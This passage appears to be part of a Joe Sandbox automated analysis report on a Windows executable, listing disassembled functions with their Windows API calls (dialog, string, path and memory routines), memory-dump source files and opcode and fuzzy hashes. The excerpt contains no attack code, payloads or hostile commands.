                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: CloseEnum$DeleteValue
                          • String ID:
                          • API String ID: 1354259210-0
                          • Opcode ID: 31db4fe3a83ab3222004bb99c88de970b8ea6707b57bc237e5c93fbc2d64a622
                          • Instruction ID: 6dce0a33df475c695949d28520f5422678f12aee2cc84e9e423a55bf09ef2c56
                          • Opcode Fuzzy Hash: 31db4fe3a83ab3222004bb99c88de970b8ea6707b57bc237e5c93fbc2d64a622
                          • Instruction Fuzzy Hash: 3B215C7250010CBBDF129F90CE89EEF7B6DEB44344F100076FA15B11A0E7B48F54AAA8
                          Function 00401D8A Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetDlgItem.USER32(?,?), ref: 00401DA3
                          • GetClientRect.USER32(?,?), ref: 00401DF1
                          • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401E21
                          • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E35
                          • DeleteObject.GDI32(00000000), ref: 00401E45
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                          • String ID:
                          • API String ID: 1849352358-0
                          • Opcode ID: e1d6a9ee3c5b7c1e8a311aee8a429abf799163a7f8b121a70cc01e31e7316f78
                          • Instruction ID: fce380eb4141a570f491a0e518fb8aa8e4aa376f46a8457bbd9b5af61eb39f7b
                          • Opcode Fuzzy Hash: e1d6a9ee3c5b7c1e8a311aee8a429abf799163a7f8b121a70cc01e31e7316f78
                          • Instruction Fuzzy Hash: AE210A72E00509AFDF15DF94DD45AAEBBB6FB48300F10407AF505F62A1CB389941DB58
                          Function 00404B76 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlenA.KERNEL32(0042A488,0042A488,?,%u.%u%s%s,?,00000000,00000000,?,000000DC,00000000,?,000000DF), ref: 00404C14
                          • wsprintfA.USER32 ref: 00404C1C
                          • SetDlgItemTextA.USER32(?,0042A488), ref: 00404C2F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: ItemTextlstrlenwsprintf
                          • String ID: %u.%u%s%s
                          • API String ID: 3540041739-3551169577
                          • Opcode ID: 17096d46716481697b9a4a6888529ebbe9c3f7ba7e60b1f399950c36a032e1d6
                          • Instruction ID: 5f9a4297b7b6a3636d8a8bee3f83e4b2b5f26aab9c0b753bab98504590b6652f
                          • Opcode Fuzzy Hash: 17096d46716481697b9a4a6888529ebbe9c3f7ba7e60b1f399950c36a032e1d6
                          • Instruction Fuzzy Hash: BE110A73A041243BEB0065AD9C45FAE3698DB85374F250237FE26F61D1EA78DC1281E9
                          Function 00405C1F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004033C5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 00405C25
                          • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004033C5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 00405C2E
                          • lstrcatA.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C), ref: 00405C3F
                          Strings
                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C1F
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: CharPrevlstrcatlstrlen
                          • String ID: C:\Users\user\AppData\Local\Temp\
                          • API String ID: 2659869361-3355392842
                          • Opcode ID: 1585f28ce29590c56c09183d2983d03a0d8d28acc38857c1cbd7e9952efaabbf
                          • Instruction ID: 5ecf558490c9fc18ca768c1c77fe203d25deaeb0153a8833875816b6af26cf17
                          • Opcode Fuzzy Hash: 1585f28ce29590c56c09183d2983d03a0d8d28acc38857c1cbd7e9952efaabbf
                          • Instruction Fuzzy Hash: 98D0A772505A306BE50136565D09ECB1A088F4231570500AFF140B2191C67C0C5147FD
                          Function 00405CB8 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                          Download Yara Rule
                          APIs
                          • CharNextA.USER32(?,?,C:\,0000000C,00405D24,C:\,C:\,77193410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,77193410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\vfhlZ0vrbe.exe"), ref: 00405CC6
                          • CharNextA.USER32(00000000), ref: 00405CCB
                          • CharNextA.USER32(00000000), ref: 00405CDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: CharNext
                          • String ID: C:\
                          • API String ID: 3213498283-3404278061
                          • Opcode ID: 48ab597918d8e2ef306ddd6e117c28a3ba6feb84c3778f0c5ad980b6008cf2cb
                          • Instruction ID: ee8b6173ba6a0b3c7a77adf62d8f17896d3fbd5398f7dd7aaac8169870cad506
                          • Opcode Fuzzy Hash: 48ab597918d8e2ef306ddd6e117c28a3ba6feb84c3778f0c5ad980b6008cf2cb
                          • Instruction Fuzzy Hash: 42F02B51908FA02BFB3252246C48B775B8CDF95715F048477D5407B2C2C27C6C414F9A
                          Function 00402ECD Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                          Download Yara Rule
                          APIs
                          • DestroyWindow.USER32(00000000,00000000,004030AB,00000001,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00402EE0
                          • GetTickCount.KERNEL32 ref: 00402EFE
                          • CreateDialogParamA.USER32(0000006F,00000000,00402E4A,00000000), ref: 00402F1B
                          • ShowWindow.USER32(00000000,00000005,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00402F29
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                          • String ID:
                          • API String ID: 2102729457-0
                          • Opcode ID: 82cc071085b0e421d38bebfb76feb0ba11fa504106e74bc84e10844e5b096cab
                          • Instruction ID: 55e8d60830c64a568362c8f460213b41695a60035779f7009bf19f5ad348a086
                          • Opcode Fuzzy Hash: 82cc071085b0e421d38bebfb76feb0ba11fa504106e74bc84e10844e5b096cab
                          • Instruction Fuzzy Hash: B7F03A30A45621EBC771AB50FE0CA9B7B64FB05B59B41043AF001F11A9CB745852DBED
                          Function 00405345 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                          Download Yara Rule
                          APIs
                          • IsWindowVisible.USER32(?), ref: 00405374
                          • CallWindowProcA.USER32(?,?,?,?), ref: 004053C5
                            • Part of subcall function 00404379: SendMessageA.USER32(00010458,00000000,00000000,00000000), ref: 0040438B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: Window$CallMessageProcSendVisible
                          • String ID:
                          • API String ID: 3748168415-3916222277
                          • Opcode ID: b9d322c03724d0f4ccaad077e5ef09c26c8614d3de5af0662f84842769c694b6
                          • Instruction ID: 98c6722e6a54b641667f931c9e29074c60bd52ab0debc5010bc9b6450a54dc72
                          • Opcode Fuzzy Hash: b9d322c03724d0f4ccaad077e5ef09c26c8614d3de5af0662f84842769c694b6
                          • Instruction Fuzzy Hash: 9201B171100608AFFF205F11ED84A6B3A26EB84794F50413BFE407A1D1C3B98C629E5E
                          Function 00403A01 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                          Download Yara Rule
                          APIs
                          • FreeLibrary.KERNEL32(?,77193410,00000000,C:\Users\user\AppData\Local\Temp\,004039D9,004037BF,?,?,00000008,0000000A,0000000C), ref: 00403A1B
                          • GlobalFree.KERNEL32(00000000), ref: 00403A22
                          Strings
                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A01
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: Free$GlobalLibrary
                          • String ID: C:\Users\user\AppData\Local\Temp\
                          • API String ID: 1100898210-3355392842
                          • Opcode ID: 0079c2f67775dda8b537f62a0fedec5a832efd40d4ebab5497539fb8ea7bc8ed
                          • Instruction ID: 5c739cdb98e40ae8c0dfefb52ad11f1475293c83533685fd3a033b9eca192303
                          • Opcode Fuzzy Hash: 0079c2f67775dda8b537f62a0fedec5a832efd40d4ebab5497539fb8ea7bc8ed
                          • Instruction Fuzzy Hash: 16E01D3361513057CA315F45FD0579A77685F58B27F09403AE8807715587745D434FD9
                          Function 00405C66 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F9D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\vfhlZ0vrbe.exe,C:\Users\user\Desktop\vfhlZ0vrbe.exe,80000000,00000003,?,?,00403722,?,?,00000008,0000000A), ref: 00405C6C
                          • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F9D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\vfhlZ0vrbe.exe,C:\Users\user\Desktop\vfhlZ0vrbe.exe,80000000,00000003,?,?,00403722,?), ref: 00405C7A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: CharPrevlstrlen
                          • String ID: C:\Users\user\Desktop
                          • API String ID: 2709904686-3370423016
                          • Opcode ID: 636972430895b8d26769eef308ecf034eeaaaa2c94ab7ae9d1342fa23427dc1b
                          • Instruction ID: c418d430c32a25fd64e5672735cb35cda0f462e3a1cf334074a775347c04a98e
                          • Opcode Fuzzy Hash: 636972430895b8d26769eef308ecf034eeaaaa2c94ab7ae9d1342fa23427dc1b
                          • Instruction Fuzzy Hash: 62D0A7B240CEB02FF70362108D00B9F6A48CF13704F0904A7E080E2190C27C0C4147AD
                          Function 00405D85 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D95
                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405DAD
                          • CharNextA.USER32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DBE
                          • lstrlenA.KERNEL32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DC7
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: lstrlen$CharNextlstrcmpi
                          • String ID:
                          • API String ID: 190613189-0
                          • Opcode ID: 4f1eaa0065bfc49b54b56e64601aea382fadfb9647de4ff4bb676f0ffe3a7a9e
                          • Instruction ID: 0b01db06aa3b468373a9359c006e34c779135354681a34c4aba1de8cdbfa9028
                          • Opcode Fuzzy Hash: 4f1eaa0065bfc49b54b56e64601aea382fadfb9647de4ff4bb676f0ffe3a7a9e
                          • Instruction Fuzzy Hash: 86F0C231100418AFC7029BA5CE0499EBBA8EF06250B2180AAE840F7211D674DE01AB6C